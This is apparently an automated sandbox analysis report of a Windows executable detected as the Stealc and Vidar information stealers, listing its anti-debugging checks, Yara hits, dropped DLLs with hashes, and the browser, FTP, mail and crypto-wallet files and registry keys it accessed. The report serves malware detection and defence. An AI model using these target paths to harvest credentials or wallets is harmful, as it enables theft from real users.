Code function: 0_2_003245C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003245C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00339860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339750 mov eax, dword ptr fs:[00000030h]

0_2_00339750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00337850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00339600

Source: file.exe, file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: \|f5$Program Manager
Source: file.exe, 00000000.00000002.2359595891.0000000000703000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o\|f5$Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00337B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00336920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00336920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00337850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00337A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00337A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2359171753.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2086620561.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2359171753.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2086620561.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1968, type: MEMORYSTR

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1541053
Product:	CloudBasic
Start time:	11:01:15
Start date:	24.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e13d89812ee808b7637fe554797b759b
SHA1:	d392ee05ccd8da3985594fc8deb0ecdd5a23e8fb
SHA256:	2fe1592ed1c0bd162f4de4abb3a023ed7eac5426acf02b5df89ae163449d7c5f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AAFIDGCFHIEHJJJJECAK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\BFBGDGIDBAAEBFHJKJDGCGCGDG	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\CBKJEGCB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
C:\ProgramData\GIDHDGCBFBKECBFHCAFHJDBGHC	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	9D46F142BBCF25D0D495FF1F3A7609D3	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
C:\ProgramData\HIEHDAFH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	429F49156428FD53EB06FC82088FD324	560E48154B4611838CD4E9DF4C14D0F9840F06AF	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
C:\ProgramData\HIIIDAKKJJJKKECAKKJE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\IEGCBAAFHDHDHJKEGCFCBFHJDH	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\IJKFHDBKFCAAECBFIDHJECBKEB	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	D2A38A463B7925FE3ABE31ECCCE66ACA	A1824888F9E086439B287DEA497F660F3AA4B397	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
C:\ProgramData\JJKFBAKFBGDHIEBGDAKF	ASCII text, with very long lines (1743), with CRLF line terminators	1191AEB8EAFD5B2D5C29DF9B62C45278	584A8B78810AEE6008839EF3F1AC21FD5435B990	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains
